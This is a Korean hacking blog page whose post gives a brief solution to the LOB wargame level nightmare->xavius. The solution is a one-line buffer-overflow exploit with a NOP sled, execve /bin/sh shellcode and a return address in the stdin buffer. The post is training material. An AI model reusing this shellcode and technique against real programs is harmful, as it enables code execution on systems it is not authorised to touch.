본문 바로가기

고졸백수해킹일기

검색하기
고졸백수해킹일기
프로필사진 ExploitSori

  • 분류 전체보기 (139)
    • Wargame (52)
      • knock.xss.moe (30)
      • lob (20)
      • pwnable.tw (2)
    • Reversing (8)
    • Pwnable (7)
    • Web (5)
    • Blockchain (10)
      • core (1)
    • CVE-Exploits (5)
    • 코딩 (13)
      • python (2)
      • node.js (4)
    • 보안상식 (2)
      • 정보보안기사 (1)
    • etc (16)
      • OS (2)
Guestbook
Notice
Recent Posts
Recent Comments
Link
«   2025/12   »
일 월 화 수 목 금 토
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30 31
Tags
  • node
  • 코드게이트 주니어
  • blueborne
  • gogs private git
  • openctf
  • module
  • Hacking
  • doorlock
  • CVE
  • https설정
  • pwnable
  • Branch
  • BLUETOOTH
  • 코드게이트
  • CODEGATE2018
  • gogs
  • codegate2017
  • 도메인 https
  • lob
  • https
  • pwntools
  • NGINX
  • Git
  • xlsx
  • Codegate
  • 노드 엑셀
  • node.js
  • npm
  • shellcraft
  • 코드게이트2017
more
Archives
Today
Total
관리 메뉴
  • 글쓰기
  • 방명록
  • RSS
  • 관리

목록lob (1)

고졸백수해킹일기

nightmare->xavius

(python -c 'print "\x90"*19+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x01\x50\x01\x40"';cat) | ./xavius 다른 문제와 다르게 fgets으로 받는다 그리고 소스를 보면 ret주소에 스택영역의 주소와 libc주소를 사용하지 못한다따라서 stdin영역을 사용하기로 했다. nop[19] + shellcode[25] + ret[4] (stdin address) throw me away

Wargame/lob 2018. 3. 13. 00:45
이전 Prev 1 Next 다음

Blog is powered by kakao / Designed by Tistory

티스토리툴바